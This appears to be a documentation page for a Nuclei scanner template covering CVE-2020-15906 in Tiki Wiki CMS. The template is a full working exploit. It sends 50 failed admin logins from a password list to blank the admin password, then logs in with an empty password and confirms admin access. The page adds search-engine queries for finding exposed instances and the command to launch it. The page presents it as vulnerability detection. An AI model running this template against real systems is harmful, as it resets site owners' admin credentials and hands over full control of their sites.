Tiki Wiki CMS GroupWare - Authentication Bypass
ID: CVE-2020-15906
Severity: critical
Author: JeonSungHyun[nukunga],gy741,oIfloraIo,nechyo,harksu
Tags: packetstorm,cve,cve2020,tiki,wiki,auth-bypass
Description
Section titled “Description”tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.
YAML Source
Section titled “YAML Source”id: CVE-2020-15906
info: name: Tiki Wiki CMS GroupWare - Authentication Bypass author: JeonSungHyun[nukunga],gy741,oIfloraIo,nechyo,harksu severity: critical description: | tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts. reference: - https://packetstormsecurity.com/files/159663/Tiki-Wiki-CMS-Groupware-21.1-Authentication-Bypass.html - https://nvd.nist.gov/vuln/detail/CVE-2020-15906 - https://github.com/Z0fhack/Goby_POC - https://github.com/bakery312/Vulhub-Reproduce - https://github.com/20142995/Goby classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-15906 cwe-id: CWE-307 epss-score: 0.02136 epss-percentile: 0.88924 cpe: cpe:2.3:a:tiki:tiki:*:*:*:*:*:*:*:* metadata: vendor: tiki product: tiki shodan-query: title:"Tiki Wiki CMS" fofa-query: title="Tiki Wiki CMS" google-query: intitle:"Tiki Wiki CMS tags: packetstorm,cve,cve2020,tiki,wiki,auth-bypass
http: - raw: - | GET /tiki-login_scr.php HTTP/1.1 Host: {{Hostname}}
extractors: - type: regex part: body name: ticket1 internal: true group: 1 regex: - 'class="ticket" name="ticket" value="(.*)"'
- raw: - | POST /tiki-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: {{RootURL}}/tiki-login_scr.php
ticket={{ticket1}}&user=admin&pass={{attempt}}&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n
payloads: attempt: - nkQ0yYzgF5Er - P5UdGflH48W3 - xFq7vKNLmhZp - 8zKtGnh4dW5R - CfXp2VbQz8Er - Lh3K6vPzM9Xn - bG4RxHpY2MdQ - 7zNtKh3WqF5L - Y8rQ2GpLx9Kn - C7KzLmP5X9Vh - v3LdX8GmQ5Kn - W4NzX6PqL3Ft - Q5GhY2VrX7Jk - r9KdL4PhY6Gm - 8XjVq5LhZ2Kr - L5WnQ9KzY8Pr - M2XdL5GrY9Kh - N6YzP8WkL5Xt - G7JqX5VbM2Kp - H4PrX8LkY6Gm - J5LhY2VqX9Kr - 8GrX5NqL2KhY - K4WnY9PzM8Xt - Q2XkL5PrY8Vh - 9JhL4VqX5GrM - N2XdY5PqL9Kh - W4LhY8KzM5Xt - G5JqX2VrY9Kp - H9PrL5XkY2Gm - L8WnX5KzY9Pr - M4XkY2LqV5Gt - N5XdL9PqY8Kr - P8XnL5VrY2Kh - Q4JqX9LhY5Gr - V7LkX5PrY2Gt - L2WnY9KzX8Pr - M9XdL5PqY4Kh - N8LhY2VqX5Gr - Q7XkL5PrY9Gm - X4LhY8WnM5Kp - G2JqL5VrY9Kt - H7PrX8KzY2Gm - J4LhY5VqX9Kr - N9XkY2LqP5Gt - W8LhY5PrX2Kz - G4JqL5XkY9Vr - P5WnY2KzL8Gt - M7XkY9LhP2Gr - Q2JqL5VrY8Kh - 2JqL5VrY8Kh attack: batteringram threads: 50
- raw: - | GET /tiki-login_scr.php HTTP/1.1 Host: {{Hostname}}
- | POST /tiki-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: {{RootURL}}/tiki-login.php
ticket={{ticket2}}&user=admin&pass=&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n
extractors: - type: regex part: body_1 name: ticket2 internal: true group: 1 regex: - 'class="ticket" name="ticket" value="(.*)"'
- raw: - | GET /tiki-index.php HTTP/1.1 Host: {{Hostname}}
matchers-condition: or matchers: - type: word part: body words: - "System Menu" - "Home" - "Search" - "Wiki" - "File Galleries" - "Settings" condition: and
- type: word words: - "Show on admin log-in" - "Tiki Setup" condition: and# digest: 4b0a00483046022100a4a60ab70fdcd49dcec8faeb55652b99c4a2025988af3ebc213d9fcac0bdc98b022100d6f7b0a7bf3f39f2b78ba8adb120fd8d6568b8c5dfa4d2062c60d848e884eb84:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-15906.yaml"